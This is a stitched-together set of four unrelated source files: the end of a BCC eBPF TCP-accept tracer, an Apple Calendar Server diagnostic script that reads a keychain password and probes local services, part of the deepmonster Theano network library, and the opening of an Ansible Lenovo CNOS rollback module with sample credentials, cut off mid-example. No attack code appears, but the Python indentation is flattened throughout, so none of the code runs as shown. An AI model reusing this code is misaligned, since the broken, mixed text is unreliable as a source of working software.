struct ipv6_data_t data6 = {.pid = pid, .ip = 6};
data6.ts_us = bpf_ktime_get_ns() / 1000;
bpf_probe_read_kernel(&data6.saddr, sizeof(data6.saddr),
&newsk->__sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
bpf_probe_read_kernel(&data6.daddr, sizeof(data6.daddr),
&newsk->__sk_common.skc_v6_daddr.in6_u.u6_addr32);
data6.lport = lport;
data6.dport = dport;
bpf_get_current_comm(&data6.task, sizeof(data6.task));
ipv6_events.perf_submit(ctx, &data6, sizeof(data6));
}
// else drop
return 0;
}
"""
bpf_text += bpf_text_kprobe
# code substitutions
if args.pid:
bpf_text = bpf_text.replace('##FILTER_PID##',
'if (pid != %s) { return 0; }' % args.pid)
else:
bpf_text = bpf_text.replace('##FILTER_PID##', '')
if args.port:
lports = [int(lport) for lport in args.port.split(',')]
lports_if = ' && '.join(['lport != %d' % lport for lport in lports])
bpf_text = bpf_text.replace('##FILTER_PORT##',
'if (%s) { return 0; }' % lports_if)
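# e.g. "-P 80,81" expands ##FILTER_PORT## to:
#   if (lport != 80 && lport != 81) { return 0; }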
bpf_text = filter_by_containers(args) + bpf_text
if debug or args.ebpf:
print(bpf_text)
if args.ebpf:
exit()
bpf_text = bpf_text.replace('##FILTER_PORT##', '')
# process event
def print_ipv4_event(cpu, data, size):
event = b["ipv4_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET, pack("I", event.daddr)).encode(),
event.dport,
inet_ntop(AF_INET, pack("I", event.saddr)).encode(),
event.lport))
def print_ipv6_event(cpu, data, size):
event = b["ipv6_events"].event(data)
global start_ts
if args.time:
printb(b"%-9s" % strftime("%H:%M:%S").encode('ascii'), nl="")
if args.timestamp:
if start_ts == 0:
start_ts = event.ts_us
printb(b"%-9.3f" % ((float(event.ts_us) - start_ts) / 1000000), nl="")
printb(b"%-7d %-12.12s %-2d %-16s %-5d %-16s %-5d" % (event.pid,
event.task, event.ip,
inet_ntop(AF_INET6, event.daddr).encode(),
event.dport,
inet_ntop(AF_INET6, event.saddr).encode(),
event.lport))
# initialize BPF
b = BPF(text=bpf_text)
# header
if args.time:
print("%-9s" % ("TIME"), end="")
if args.timestamp:
print("%-9s" % ("TIME(s)"), end="")
print("%-7s %-12s %-2s %-16s %-5s %-16s %-5s" % ("PID", "COMM", "IP", "RADDR",
"RPORT", "LADDR", "LPORT"))
start_ts = 0
# read events
b["ipv4_events"].open_perf_buffer(print_ipv4_event)
b["ipv6_events"].open_perf_buffer(print_ipv6_event)
while 1:
try:
b.perf_buffer_poll()
except KeyboardInterrupt:
exit()
|
|
#!/usr/bin/env python
##
# Copyright (c) 2014-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from __future__ import print_function
import sys
from getopt import getopt, GetoptError
import os
from plistlib import readPlist, readPlistFromString
import re
import subprocess
import urllib2
PREFS_PLIST = "/Library/Server/Preferences/Calendar.plist"
ServerHostName = ""
class FileNotFound(Exception):
"""
Missing file exception
"""
def usage(e=None):
if e:
print(e)
print("")
name = os.path.basename(sys.argv[0])
print("usage: {} [options]".format(name))
print("options:")
print(" -h --help: print this help and exit")
if e:
sys.exit(64)
else:
sys.exit(0)
def main():
if os.getuid() != 0:
usage("This program must be run as root")
try:
optargs, _ignore_args = getopt(
sys.argv[1:], "h", [
"help",
"phantom",
],
)
    except GetoptError as e:
usage(e)
for opt, arg in optargs:
# Args come in as encoded bytes
arg = arg.decode("utf-8")
if opt in ("-h", "--help"):
usage()
elif opt == "--phantom":
result = detectPhantomVolume()
sys.exit(result)
osBuild = getOSBuild()
print("OS Build: {}".format(osBuild))
serverBuild = getServerBuild()
print("Server Build: {}".format(serverBuild))
print()
try:
if checkPlist(PREFS_PLIST):
print("{} exists and can be parsed".format(PREFS_PLIST))
else:
print("{} exists but cannot be parsed".format(PREFS_PLIST))
except FileNotFound:
print("{} does not exist (but that's ok)".format(PREFS_PLIST))
serverRoot = getServerRoot()
print("Prefs plist says ServerRoot directory is: {}".format(serverRoot.encode("utf-8")))
result = detectPhantomVolume(serverRoot)
if result == EXIT_CODE_OK:
print("ServerRoot volume ok")
elif result == EXIT_CODE_SERVER_ROOT_MISSING:
print("ServerRoot directory missing")
elif result == EXIT_CODE_PHANTOM_DATA_VOLUME:
print("Phantom ServerRoot volume detected")
systemPlist = os.path.join(serverRoot, "Config", "caldavd-system.plist")
try:
if checkPlist(systemPlist):
print("{} exists and can be parsed".format(systemPlist.encode("utf-8")))
else:
print("{} exists but cannot be parsed".format(systemPlist.encode("utf-8")))
except FileNotFound:
print("{} does not exist".format(systemPlist.encode("utf-8")))
userPlist = os.path.join(serverRoot, "Config", "caldavd-user.plist")
try:
if checkPlist(userPlist):
print("{} exists and can be parsed".format(userPlist.encode("utf-8")))
else:
print("{} exists but cannot be parsed".format(userPlist.encode("utf-8")))
except FileNotFound:
print("{} does not exist".format(userPlist.encode("utf-8")))
keys = showConfigKeys()
showProcesses()
showServerctlStatus()
showDiskSpace(serverRoot)
postgresRunning = showPostgresStatus(serverRoot)
if postgresRunning:
showPostgresContent()
password = getPasswordFromKeychain("com.apple.calendarserver")
connectToAgent(password)
connectToCaldavd(keys)
showWebApps()
EXIT_CODE_OK = 0
EXIT_CODE_SERVER_ROOT_MISSING = 1
EXIT_CODE_PHANTOM_DATA_VOLUME = 2
def detectPhantomVolume(serverRoot=None):
"""
Check to see if serverRoot directory exists in a "phantom" volume, meaning
it's simply a directory under /Volumes residing on the boot volume, rather
    than a real separate volume.
"""
if not serverRoot:
serverRoot = getServerRoot()
if not os.path.exists(serverRoot):
return EXIT_CODE_SERVER_ROOT_MISSING
if serverRoot.startswith("/Volumes/"):
bootDevice = os.stat("/").st_dev
dataDevice = os.stat(serverRoot).st_dev
if bootDevice == dataDevice:
return EXIT_CODE_PHANTOM_DATA_VOLUME
return EXIT_CODE_OK
def showProcesses():
print()
print("Calendar and Contacts service processes:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/bin/ps", "ax",
"-o user",
"-o pid",
"-o %cpu",
"-o %mem",
"-o rss",
"-o etime",
"-o lstart",
"-o command"
)
for line in stdout.split("\n"):
if "_calendar" in line or "CalendarServer" in line or "COMMAND" in line:
print(line)
def showServerctlStatus():
print()
print("Serverd status:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/sbin/serverctl",
"list",
)
services = {
"org.calendarserver.agent": False,
"org.calendarserver.calendarserver": False,
"org.calendarserver.relocate": False,
}
enabledBucket = False
for line in stdout.split("\n"):
if "enabledServices" in line:
enabledBucket = True
if "disabledServices" in line:
enabledBucket = False
for service in services:
if service in line:
services[service] = enabledBucket
for service, enabled in services.iteritems():
print(
"{service} is {enabled}".format(
service=service,
enabled="enabled" if enabled else "disabled"
)
)
def showDiskSpace(serverRoot):
print()
print("Disk space on boot volume:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/bin/df",
"-H",
"/",
)
print(stdout)
print("Disk space on service data volume:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/bin/df",
"-H",
serverRoot
)
print(stdout)
print("Disk space used by Calendar and Contacts service:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/usr/bin/du",
"-sh",
os.path.join(serverRoot, "Config"),
os.path.join(serverRoot, "Data"),
os.path.join(serverRoot, "Logs"),
)
print(stdout)
def showPostgresStatus(serverRoot):
clusterPath = os.path.join(serverRoot, "Data", "Database.xpg", "cluster.pg")
print()
print("Postgres status for cluster {}:".format(clusterPath.encode("utf-8")))
code, stdout, stderr = runCommand(
"/usr/bin/sudo",
"-u",
"calendar",
"/Applications/Server.app/Contents/ServerRoot/usr/bin/pg_ctl",
"status",
"-D",
clusterPath
)
if stdout:
print(stdout)
if stderr:
print(stderr)
if code:
return False
return True
def runSQLQuery(query):
_ignore_code, stdout, stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/bin/psql",
"-h",
"/var/run/caldavd/PostgresSocket",
"--dbname=caldav",
"--username=caldav",
"--command={}".format(query),
)
if stdout:
print(stdout)
if stderr:
print(stderr)
def countFromSQLQuery(query):
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/bin/psql",
"-h",
"/var/run/caldavd/PostgresSocket",
"--dbname=caldav",
"--username=caldav",
"--command={}".format(query),
)
lines = stdout.split("\n")
try:
count = int(lines[2])
    except (IndexError, ValueError):
count = 0
return count
def listDatabases():
_ignore_code, stdout, stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/bin/psql",
"-h",
"/var/run/caldavd/PostgresSocket",
"--dbname=caldav",
"--username=caldav",
"--list",
)
if stdout:
print(stdout)
if stderr:
print(stderr)
def showPostgresContent():
print()
print("Postgres content:")
print()
listDatabases()
print("'calendarserver' table...")
runSQLQuery("select * from calendarserver;")
count = countFromSQLQuery("select count(*) from calendar_home;")
print("Number of calendar homes: {}".format(count))
count = countFromSQLQuery("select count(*) from calendar_object;")
print("Number of calendar events: {}".format(count))
count = countFromSQLQuery("select count(*) from addressbook_home;")
print("Number of contacts homes: {}".format(count))
count = countFromSQLQuery("select count(*) from addressbook_object;")
print("Number of contacts cards: {}".format(count))
count = countFromSQLQuery("select count(*) from delegates;")
print("Number of non-group delegate assignments: {}".format(count))
count = countFromSQLQuery("select count(*) from delegate_groups;")
print("Number of group delegate assignments: {}".format(count))
print("'job' table...")
runSQLQuery("select * from job;")
def showConfigKeys():
print()
print("Configuration:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/sbin/calendarserver_config",
"EnableCalDAV",
"EnableCardDAV",
"Notifications.Services.APNS.Enabled",
"Scheduling.iMIP.Enabled",
"Authentication.Basic.Enabled",
"Authentication.Digest.Enabled",
"Authentication.Kerberos.Enabled",
"ServerHostName",
"HTTPPort",
"SSLPort",
)
hidden = [
"ServerHostName",
]
keys = {}
for line in stdout.split("\n"):
if "=" in line:
key, value = line.strip().split("=", 1)
keys[key] = value
if key not in hidden:
print("{key} : {value}".format(key=key, value=value))
return keys
def runCommand(commandPath, *args):
"""
Run a command line tool and return the output
"""
if not os.path.exists(commandPath):
raise FileNotFound
commandLine = [commandPath]
if args:
commandLine.extend(args)
child = subprocess.Popen(
args=commandLine,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
output, error = child.communicate()
return child.returncode, output, error
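# Example (illustrative) of runCommand usage elsewhere in this script:
#     code, out, err = runCommand("/bin/df", "-H", "/")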
def getOSBuild():
try:
code, stdout, _ignore_stderr = runCommand("/usr/bin/sw_vers", "-buildVersion")
if not code:
return stdout.strip()
    except:
        pass
    return "Unknown"
def getServerBuild():
try:
code, stdout, _ignore_stderr = runCommand("/usr/sbin/serverinfo", "--buildversion")
if not code:
return stdout.strip()
except:
pass
return "Unknown"
def getServerRoot():
"""
Return the ServerRoot value from the servermgr_calendar.plist. If not
present, return the default.
@rtype: C{unicode}
"""
try:
serverRoot = u"/Library/Server/Calendar and Contacts"
if os.path.exists(PREFS_PLIST):
serverRoot = readPlist(PREFS_PLIST).get("ServerRoot", serverRoot)
if isinstance(serverRoot, str):
serverRoot = serverRoot.decode("utf-8")
return serverRoot
except:
return "Unknown"
def checkPlist(plistPath):
if not os.path.exists(plistPath):
raise FileNotFound
try:
readPlist(plistPath)
except:
return False
return True
def showWebApps():
print()
print("Web apps:")
_ignore_code, stdout, _ignore_stderr = runCommand(
"/Applications/Server.app/Contents/ServerRoot/usr/sbin/webappctl",
"status",
"-"
)
print(stdout)
##
# Keychain access
##
passwordRegExp = re.compile(r'password: "(.*)"')
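# Note: "security find-generic-password -g" prints the password line on
# stderr, which is why getPasswordFromKeychain() searches stderr below.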
def getPasswordFromKeychain(account):
code, _ignore_stdout, stderr = runCommand(
"/usr/bin/security",
"find-generic-password",
"-a",
account,
"-g",
)
if code:
return None
else:
match = passwordRegExp.search(stderr)
if not match:
print(
"Password for {} not found in keychain".format(account)
)
return None
else:
return match.group(1)
readCommand = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>command</key>
<string>readConfig</string>
</dict>
</plist>
"""
def connectToAgent(password):
print()
print("Agent:")
url = "http://localhost:62308/gateway/"
user = "com.apple.calendarserver"
auth_handler = urllib2.HTTPDigestAuthHandler()
auth_handler.add_password(
realm="/Local/Default",
uri=url,
user=user,
passwd=password
)
opener = urllib2.build_opener(auth_handler)
# ...and install it globally so it can be used with urlopen.
urllib2.install_opener(opener)
# Send HTTP POST request
request = urllib2.Request(url, readCommand)
try:
print("Attempting to send a request to the agent...")
response = urllib2.urlopen(request, timeout=30)
except Exception as e:
print("Can't connect to agent: {}".format(e))
return False
html = response.read()
code = response.getcode()
if code == 200:
try:
data = readPlistFromString(html)
except Exception as e:
print(
"Could not parse response from agent: {error}\n{html}".format(
error=e, html=html
)
)
return False
if "result" in data:
print("...success")
else:
print("Error in agent's response:\n{}".format(html))
return False
else:
print("Got an error back from the agent: {code} {html}".format(
code=code, html=html)
)
return True
def connectToCaldavd(keys):
print()
print("Server connection:")
url = "https://{host}/principals/".format(host=keys["ServerHostName"])
try:
print("Attempting to send a request to port 443...")
response = urllib2.urlopen(url, timeout=30)
html = response.read()
code = response.getcode()
print(code, html)
if code == 200:
print("Received 200 response")
except urllib2.HTTPError as e:
code = e.code
reason = e.reason
if code == 401:
print("Got the expected response")
else:
print(
"Got an unexpected response: {code} {reason}".format(
code=code, reason=reason
)
)
except Exception as e:
print("Can't connect to port 443: {error}".format(error=e))
if __name__ == "__main__":
main()
|
|
import copy
from inspect import isclass
import theano.tensor as T
from deepmonster.utils import flatten
from deepmonster import utils  # assumed available; used below as utils.parse_tuple
from deepmonster.nnet.baselayers import AbsLayer
from deepmonster.nnet.simple import BiasLayer
def propagate(func):
"""Network decorator to propagate a function call to all layers attribute of a class.
"""
def propagate_func(*args, **kwargs):
ff = args[0]
for i, layer in enumerate(ff.layers):
new_args = tuple([args[0], i, layer] + list(args[1:]))
func(*new_args, **kwargs)
return propagate_func
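# Note: the wrapped function is invoked once per layer with the signature
# (self, layer_index, layer, *original_args, **kwargs).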
class Feedforward(object):
"""
Feedforward abstract class managing a series of Layer class.
    ***The logic of the attribute setting is always that if a hyperparameter
such as batch_norm is set on a Layer, it will have priority
over what is given to Feedforward constructor. If it is None and
Feedforward receives something, it will set this value to the Layer.
If a hyperparam is None in both Layer and Feedforward and Layer needs
it to do something, it will obviously crash.
"""
def __init__(self, layers, prefix, **kwargs):
self.layers = layers
self.prefix = prefix
self.fprop_passes = {}
no_init = kwargs.pop('no_init', False)
self.attr_error_tolerance = kwargs.pop('attr_error_tolerance', 'warn')
        if len(kwargs) > 0:
self._set_attributes(kwargs)
# would be useful but try to not break all the past scripts
self._has_been_init = False
if not no_init:
#self.set_io_dims()
self.initialize()
self._has_been_init = True
def __repr__(self):
# printing an empty string would be quite boring
if hasattr(self, 'prefix') and self.prefix != '':
return self.prefix
return super(Feedforward, self).__repr__()
@property
def params(self):
return find_attributes(self.layers, 'params')
# sugar syntax, but much needed sugar
@property
def parameters(self):
return self.params
@property
def outputs_info(self):
return tuple(find_attributes(self.layers, 'outputs_info'))
@property
def output_dims(self):
return self.layers[-1].output_dims
@property
def input_dims(self):
return self.layers[0].input_dims
def _recurrent_warning(self, msg):
# this is a poor way to do it but it works!
if msg != getattr(self, 'last_msg', ''):
print msg
self.last_msg = msg
# ---- THESE METHODS ARE PROPAGATED WHEN CALLED ----
    # example : foo = Feedforward(layers, 'foo', **fooconfig)
# foo.switch_for_inference()
# will propagate switch_for_inference to all layers
@propagate
def _set_attributes(self, i, layer, dict_of_hyperparam):
if hasattr(layer, '_set_attributes'):
layer._set_attributes(dict_of_hyperparam)
self.set_attributes(layer, dict_of_hyperparam)
@propagate
def set_io_dims(self, i, layer, tup=None):
if i == 0 :
if not hasattr(layer, 'input_dims') and tup is None:
raise ValueError("The very first layer of this chain needs its input_dims!")
input_dims = getattr(layer, 'input_dims', (None,))
if None in input_dims:
dims = tup
else:
dims = input_dims
else:
dims = self.layers[i-1].output_dims
layer.set_io_dims(dims)
@propagate
def initialize(self, i, layer, **kwargs):
if self._has_been_init:
            msg = self.prefix + " has already been initialized, suppressing this init call"
self._recurrent_warning(msg)
return
layer.prefix = self.prefix + str(i)
tup = kwargs.pop('tup', None)
if i == 0 :
if not hasattr(layer, 'input_dims') and tup is None:
raise ValueError("The very first layer of this chain needs its input_dims!")
input_dims = getattr(layer, 'input_dims', (None,))
if None in input_dims:
dims = tup
else:
dims = input_dims
else:
dims = self.layers[i-1].output_dims
layer.initialize(dims, **kwargs)
@propagate
def _fprop(self, i, layer, **kwargs):
input_id = kwargs.pop('input_id', 0)
if i < input_id:
return
# kwargs filtering
for keyword in kwargs.keys():
if keyword not in layer.accepted_kwargs_fprop:
kwargs.pop(keyword)
if self.concatenation_tags.has_key(i):
_input = T.concatenate([self.activations_list[-1]] +
self.concatenation_tags[i][0],
axis=self.concatenation_tags[i][1])
else:
_input = self.activations_list[-1]
y = layer.fprop(_input, **kwargs)
self.activations_list.append(y)
@propagate
def _get_outputs_info(self, i, layer, *args, **kwargs):
if hasattr(layer, 'get_outputs_info'):
self._outputs_info += layer.get_outputs_info(*args, **kwargs)
# ------------------------------------------------- #
def set_attributes(self, layer, dict_of_hyperparam):
"""
"""
for attr_name, attr_value in dict_of_hyperparam.iteritems() :
# if attr_name is set to a layer, it will keep that layer's attr_value
try :
attr = getattr(layer, attr_name)
except AttributeError :
self.attribute_error(layer, attr_name)
continue
if attr is None:
if isinstance(attr_value, AbsLayer):
# make sure every layer has its own unique instance of the class
# deepcopy is very important or they might share unwanted stuff
# across layers (ex.: params)
attr_value = copy.deepcopy(attr_value)
setattr(layer, attr_name, attr_value)
elif isinstance(attr, tuple):
                # a (None,) won't trigger the first if, but it doesn't count!
if attr[0] is None:
setattr(layer, attr_name, utils.parse_tuple(attr_value, len(attr)))
def attribute_error(self, layer, attr_name, message='default'):
if message == 'default':
message = "trying to set layer "+ layer.__class__.__name__ + \
" with attribute " + attr_name
        if self.attr_error_tolerance == 'warn':
            print "WARNING:", message
        elif self.attr_error_tolerance == 'raise':
            raise AttributeError(message)
#TODO: make concatenation_tags actually an input injecting mechanism through the
# input injecting layers, it would make it possible to use the same logic to do different
# input injection.
def fprop(self, x, output_id=-1, pass_name=None, concatenation_tags=None, **kwargs):
"""Forward propagation passes through each self.layers
Accepted keywords:
- inpud_id : use this index to start the fprop at that point in the feedforward block
- output_id : will return this index, can use 'all' for returning the whole list
***WARNING: Index 0 is the input! The output of the first layer starts at index 1***
            - pass_name : if defined, will update the fprop_passes dict with {pass_name : activations_list}.
                Primarily useful when the same network is used more than once and the
                activations created by each fprop pass need to be stored somewhere.
            - concatenation_tags: inject inputs at different stages of the fprop chain,
              a dictionary of the format:
                - {int: (list[tensor,], int)} OR {int: list[tensor,]} OR {int: tensor}
                - int: id of the layer at which to inject the inputs by concatenation
                - list[tensor,] OR tensor: list of tensors or tensor to inject
                - (optionally) int: axis of the concatenation.
"""
        # standardize the dict with {id of layer to inject input :
# (list of tensors to concat, which axis)}
if concatenation_tags is not None:
assert isinstance(concatenation_tags, dict), "concat tag needs to be a dict"
# we could point directly to the layers with their name?
assert all([isinstance(k, int) for k in concatenation_tags.keys()]), \
"concat dict keys need to be int"
for key, val in concatenation_tags.iteritems():
if not isinstance(val, (list, tuple)) or len(val) == 1 or not isinstance(val[1], int):
val = [val, None]
else:
assert len(val) == 2
if not isinstance(val[0], list):
val = [[val[0]], val[1]]
assert len(set([v.ndim for v in val[0]])) == 1, "A list of tensors " +\
"to concat was given but not all have same dim"
if val[1] is None:
# default on the channel axis
ndim = val[0][0].ndim
val[1] = ndim - 3 if ndim in [4, 5] else ndim - 1
concatenation_tags[key] = tuple(val)
else:
concatenation_tags = {}
self.concatenation_tags = concatenation_tags
self.activations_list = [x]
self._fprop(**kwargs)
if pass_name is not None:
assert isinstance(pass_name, str), "pass_name needs to be a string"
self.fprop_passes.update({pass_name : self.activations_list})
# they are useful only for a single pass and should not be kept as state variable
del self.concatenation_tags
if output_id == 'all':
return self.activations_list
elif isinstance(output_id, list):
return [self.activations_list[i] for i in output_id]
else:
return self.activations_list[output_id]
def get_outputs_info(self, *args, **kwargs):
self._outputs_info = []
self._get_outputs_info(*args, **kwargs)
return self._outputs_info
class StandardBlock(Feedforward):
"""Standard blocks of Layers module. Every piece of the Layer class could technically
be used all seperatly, but this encapsulate the regular usage of layer i.e.:
y = activation(normalization(apply(W,x) + b))
- y: output
- x: input
- W: apply parameters
- b: bias parameters
- apply: some method coupling x and W together (ex.: FullyConnectedLayer: dot)
        - normalization: normalization class instance normalizing the output of apply
(ex.: BatchNorm)
- activation: activation class instance applying a function before the output
(ex.: Rectifier or ReLU)
The block interface is designed to work with Feedforward in order to initialize multiple layers
    in a somewhat lazy way. For this it provides the set_attributes method, which allows keywords not
    given at __init__ time to be given to Feedforward so it can propagate them all and set them on
its list of layers. This comes with the cost that we do not know at __init__ time how to
construct the block. It is therefore done in construct_block method that should ideally
be called after __init__ and set_attributes.
"""
apply_layer_type = NotImplemented
# special kwargs shared with its apply layer
shared_with_apply_kwargs = ['initialization', 'param_norm']
def __init__(self, *args, **kwargs):
# filter kwargs, after this it should contain only apply layer kwargs
# and return the one for this class
kwargs = self.parse_kwargs(**kwargs)
self.set_apply_layer(args, kwargs)
def parse_kwargs(self, bias=True, apply_layer=None, activation_norm=None,
activation=None, initialization=None, param_norm=None,
attr_error_tolerance='warn', apply_fetch=None, **kwargs):
"""Because def __init__(self, *args, a_kwarg=a_default_val, **kwargs) is a python
syntax error, we cannot write the __init__ of StandardBlock this way. The constructor
of StandardBlock pipes args and kwargs for the constructor of its apply Layer. Kwargs
        dedicated to itself are defined here and unpacked while passing **kwargs to this method
at __init__ time.
"""
for k, v in locals().iteritems():
if k == 'kwargs':
continue
            setattr(self, k, v)
kwargs.update({x: getattr(self, x) for x in self.shared_with_apply_kwargs})
return kwargs
@property
def layers(self):
# block follow the strict layer order: apply, bias, act_norm, act
layers = filter(
lambda x: x is not None,
[getattr(self, x, None) for x in ['apply_layer', 'bias_layer', 'activation_norm_layer', 'activation']])
return layers
def set_apply_layer(self, args, kwargs):
"""Set the apply layer
"""
if self.apply_layer is None and self.apply_layer_type is NotImplemented:
raise NotImplementedError("No apply layer given to construct this block")
if self.apply_layer is not None and self.apply_layer_type is not NotImplemented:
raise RuntimeError("Ambiguity while trying to construct a standard block")
if isinstance(self.apply_layer, AbsLayer):
return
elif isinstance(self.apply_fetch, str):
assert isinstance(self.apply_layer_type, dict), \
"Cannot fetch apply layer by string if its apply_layer_type is not implemented as a dict"
ApplyLayer = self.apply_layer_type[self.apply_fetch]
elif isclass(self.apply_layer):
ApplyLayer = self.apply_layer
elif self.apply_layer is None:
if isinstance(self.apply_layer_type, dict):
ApplyLayer = self.apply_layer_type['default']
else:
ApplyLayer = self.apply_layer_type
else:
raise ValueError("Does not recognize apply layer")
self.apply_layer = ApplyLayer(*args, **kwargs)
#def set_attributes(self, layer, dict_of_hyperparam):
# import ipdb; ipdb.set_trace()
# # since we are catching set_attributes, self and layer are this object
# # first set attributes on the whole block
# super(StandardBlock, self).set_attributes(layer, dict_of_hyperparam)
# # second propagate it down its own layers list
# super(StandardBlock, self)._set_attributes(dict_of_hyperparam)
def get_layer(self, layerkey):
layer_opt = getattr(self, layerkey)
if layer_opt is None or layer_opt is False:
return None
elif isinstance(layer_opt, AbsLayer):
return layer_opt
elif layerkey == 'bias' and layer_opt is True:
bias_kwargs = {x: getattr(self, x, None) for x in ['initialization', 'param_norm']}
return BiasLayer(**bias_kwargs)
elif isclass(layer_opt):
raise ValueError(
"A class {} was given for layer creation in block, needs an instance".format(layer_opt))
raise ValueError("Does not recognize {}".format(layerkey))
def initialize(self, *args, **kwargs):
"""Complete the block's initialization. ApplyLayer should already exists.
Since some layers have parameters, Initialization and ParamNorm affects all ParametrizedLayer
in the block.
"""
# apply layer was already set
# set bias layer
if self.activation_norm is not None:
self.bias = False
self.bias_layer = self.get_layer('bias')
# set activation norm layer
self.activation_norm_layer = self.get_layer('activation_norm')
# set activation layer
self.activation_layer = self.get_layer('activation')
#self.activation_layer = self.activation \
# if self.activation is not None else None
# we can now safely propagate initialize call on this block of layers
# this flag is for the inner layers init
self._has_been_init = False
tup = args[0]
kwargs.update({'tup': tup})
super(StandardBlock, self).initialize(**kwargs)
def find_attributes(L, a):
# return a FLAT list of all attributes found
if isinstance(L, set):
L = list(L)
elif not isinstance(L, (list, tuple)):
L = [L]
attributes = []
for l in L:
attributes += flatten(getattr(l, a, []))
return attributes
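# Example (illustrative):
#     all_params = find_attributes(network.layers, 'params')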
def find_nets(localz):
# this is for the lazy :)
# give locals() as argument to the script defining the networks
return [item for key, item in localz.iteritems() \
if isinstance(item, Feedforward) and key != 'Feedforward']
if __name__ == '__main__':
from simple import FullyConnectedLayer
lay = [
FullyConnectedLayer(input_dims=45, output_dims=50)
]
feedfor = Feedforward(lay, 'ok', **{})
import ipdb; ipdb.set_trace()
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to Rollback Config back to Lenovo Switches
#
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_rollback
author: "Anil Kumar Muraleedharan (@amuraleedhar)"
short_description: Roll back the running or startup configuration from a remote
server on devices running Lenovo CNOS
description:
- This module allows you to work with switch configurations. It provides a
way to roll back configurations of a switch from a remote server. This is
achieved by using startup or running configurations of the target device
that were previously backed up to a remote server using FTP, SFTP, TFTP,
or SCP. The first step is to create a directory from where the remote
server can be reached. The next step is to provide the full file path of
    the backup configuration's location. Authentication details required by the
remote server must be provided as well.
By default, this method overwrites the switch's configuration file with
the newly downloaded file. This module uses SSH to manage network device
configuration. The results of the operation will be placed in a directory
named 'results' that must be created by the user in their local directory
to where the playbook is run.
version_added: "2.3"
extends_documentation_fragment: cnos
options:
configType:
description:
- This refers to the type of configuration which will be used for
the rolling back process. The choices are the running or startup
configurations. There is no default value, so it will result
in an error if the input is incorrect.
required: Yes
default: Null
choices: [running-config, startup-config]
protocol:
description:
- This refers to the protocol used by the network device to
interact with the remote server from where to download the backup
configuration. The choices are FTP, SFTP, TFTP, or SCP. Any other
protocols will result in error. If this parameter is not
specified, there is no default value to be used.
required: Yes
default: Null
choices: [SFTP, SCP, FTP, TFTP]
  serverip:
description:
- This specifies the IP Address of the remote server from where the
backup configuration will be downloaded.
required: Yes
default: Null
rcpath:
description:
- This specifies the full file path of the configuration file
located on the remote server. In case the relative path is used as
the variable value, the root folder for the user of the server
needs to be specified.
required: Yes
default: Null
serverusername:
description:
- Specify username for the server relating to the protocol used.
required: Yes
default: Null
serverpassword:
description:
- Specify password for the server relating to the protocol used.
required: Yes
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_rollback.
These are written in the main.yml file of the tasks directory.
---
- name: Test Rollback of config - Running config
  cnos_rollback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: running-config
protocol: "sftp"
serverip: "10.241.106.118"
rcpath: "/root/cnos/G8272-running-config.txt"
serverusername: "root"
serverpassword: "root123"
- name: Test Rollback of config - Startup config
  cnos_rollback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: startup-config
protocol: "sftp"
serverip: "10.241.106.118"
rcpath: "/root/cnos/G8272-startup-config.txt"
serverusername: "root"
serverpassword: "root123"
- name: Test Rollback of config - Running config - TFTP
  cnos_rollback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: running-config
protocol: "tftp"
serverip: "10.241.106.118"
rcpath: "/anil/G8272-running-config.txt"
serverusername: "root"
serverpassword: "root123"
- name: Test Rollback of config - Startup config - TFTP
  cnos_rollback:
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_rollback_{{ inventory_hostname }}_output.txt"
configType: startup-config
protocol: "tftp"
serverip: "10.241.106.118"
